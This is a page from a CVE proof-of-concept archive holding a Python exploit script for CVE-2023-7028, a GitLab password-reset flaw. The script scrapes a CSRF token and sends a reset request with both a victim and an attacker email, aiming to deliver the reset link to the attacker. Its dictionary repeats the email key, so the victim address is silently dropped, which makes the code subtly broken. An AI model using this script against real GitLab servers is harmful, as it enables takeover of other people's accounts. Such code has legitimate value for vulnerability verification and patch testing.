4837 Total CVEs
26 Years
GitHub
Home / 2023 / CVE-2023-7028
README.md
Rendering markdown...
POC / CVE-2023-7028.py PY
⬇ Raw GitHub ✕ Close 
#!/usr/bin/env python3
import argparse
import re
import requests
import os
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
session = requests.Session()


def grab_token(url):
	headers = {"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0","Referer":""+url+"/users/sign_in","Connection":"close","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate, br"}
	cookies = {"preferred_language":"en"}
	response = session.get(""+url+"/users/password/new", headers=headers,verify=False)
	pattern = r'<meta name="csrf-token" content="(.+?)" />'
	match = re.findall(pattern, response.text)
	if match:
		token = match[0]
		print(f'The CSRF token is: {token}')
		return token
	else:
		print('Error: CSRF token not found in the HTML content')
		exit()


def reset_password(url,token,victim,attacker):

	paramsPost = {"user%5Bemail%5D":victim,"user%5Bemail%5D":attacker,"authenticity_token":token}
	headers = {"Origin":""+url+"","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0","Referer":""+url+"/users/password/new","Connection":"close","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate, br","Content-Type":"application/x-www-form-urlencoded"}
	response = session.post(""+url+"/users/password", data=paramsPost, headers=headers,verify=False)
	if "If your email address exists " in response.text:
		print("Check if you have a new password reset email")
	else:
		print("Possible not vuln")

parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", required=False, default="http://gitlab.lan",help="URL of host to check will need http or https")
parser.add_argument("-v", "--victim", default="[email protected]",required=True, help="victim email address")
parser.add_argument("-a", "--attacker", default="[email protected]",required=True, help="attacker email address")
parser.add_argument("-p", "--proxy", default="",required=False, help="Proxy for debugging")
args = parser.parse_args()

url = args.url
victim = args.victim
attacker = args.attacker

if args.proxy:
	http_proxy = args.proxy
	os.environ['HTTP_PROXY'] = http_proxy
	os.environ['HTTPS_PROXY'] = http_proxy
            
if url:
	token = grab_token(url)
	reset_password(url,token,victim,attacker)